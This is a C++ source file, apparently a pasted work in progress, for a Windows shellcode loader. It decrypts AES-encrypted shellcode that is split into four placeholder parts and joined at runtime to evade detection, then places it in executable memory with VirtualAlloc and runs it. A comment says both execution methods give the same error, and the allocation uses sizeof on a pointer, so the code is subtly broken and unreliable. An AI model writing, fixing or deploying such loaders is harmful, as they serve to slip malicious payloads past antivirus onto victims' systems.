#include "pch.h"#include <iostream>#include <stdio.h>#include <openssl/con

1. #include "pch.h"
2. #include <iostream>
3. #include <stdio.h>
4. #include <openssl/conf.h>
5. #include <openssl/evp.h>
6. #include <openssl/err.h>
7. #include <Windows.h>
8. #include <string.h>
9. #include <time.h>
10.  
11. #define SHELLCODE_BUFFER 250000
12.  
13.  
14. void executeShellcode(unsigned char* shellcode) {
15. int(*ret)() = (int(*)()) shellcode;
16. ret();
17. }
18.  
19. void executeAllocShellcode(unsigned char* shellcode) {
20. void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
21. memcpy(exec, shellcode, sizeof(shellcode));
22. ((void(*)())exec)();
23. }
24.  
25. void handleErrors(void) {
26. ERR_print_errors_fp(stderr);
27. abort();
28. }
29.  
30. int decrypt(unsigned char* encrypted, int encryptedLen, unsigned char* key, unsigned char* iv, unsigned char* decrypted) {
31. EVP_CIPHER_CTX* cipherText;
32.  
33. int len, decryptedLen;
34.  
35. if (!(cipherText = EVP_CIPHER_CTX_new()))
36. handleErrors();
37.  
38. //Initialize decryption operation
39. EVP_DecryptInit_ex(cipherText, EVP_aes_256_cbc(), NULL, key, iv);
40.  
41. //Decrypt shellcode
42. EVP_DecryptUpdate(cipherText, decrypted, &len, encrypted, encryptedLen);
43.  
44. //Length of encrypted shellcode
45. decryptedLen = len;
46.  
47. //Finalize encryption
48. EVP_DecryptFinal_ex(cipherText, decrypted + len, &len);
49.  
50. //Decrypted shellcode length
51. decryptedLen += len;
52.  
53. //CleanUp
54. EVP_CIPHER_CTX_free(cipherText);
55.  
56. return decryptedLen;
57. }
58.  
59. int main() {
60. int decryptedLen, encryptedLen; //Length of shellcode
61.  
62. //128 bit AES initialization vector
63. unsigned char iv[] = "K7yT3567Abdlhfru";
64.  
65. //256 bit AES key
66. unsigned char key[] = "Yg2537shsGSTDk2820237ak72bd41453";
67.  
68.        unsigned char encrypted1[] = "Shellcode part1....";
69.        unsigned char encrypted2[] = "Shellcode part2....";
70.        unsigned char encrypted3[] = "Shellcode part3....";
71.        unsigned char encrypted4[] = "Shellcode part4....";
72.  
73.        // Concat Shellcode on Runtime
74. unsigned char encrypted[sizeof(encrypted1) + sizeof(encrypted2) + sizeof(encrypted3) + sizeof(encrypted4)];
75. memcpy(encrypted, encrypted1, sizeof(encrypted1));
76. memcpy(encrypted + sizeof(encrypted1), encrypted2, sizeof(encrypted2));
77. memcpy(encrypted + sizeof(encrypted1) + sizeof(encrypted2), encrypted3, sizeof(encrypted3));
78. memcpy(encrypted + sizeof(encrypted1) + sizeof(encrypted2) + sizeof(encrypted3), encrypted4, sizeof(encrypted4));
79. encryptedLen = sizeof(encrypted);
80.  
81. unsigned char decrypted [sizeof encrypted]; //Buffer for decrypted shellcode
82.  
83. //Initialize Openssl
84. ERR_load_crypto_strings();
85. OpenSSL_add_all_algorithms();
86. OPENSSL_config(NULL);
87.  
88. //Decrypt shellcode
89. decryptedLen = decrypt(encrypted, encryptedLen, key, iv, decrypted);
90.  
91. //CleanUp
92. EVP_cleanup();
93. ERR_free_strings();
94.  
95. printf("Decrypted: %s", &decrypted);
96.  
97. //Execute shellcode (Tried Both) -> Same error.
98. //executeShellcode(decrypted);
99. executeAllocShellcode(decrypted);
100. }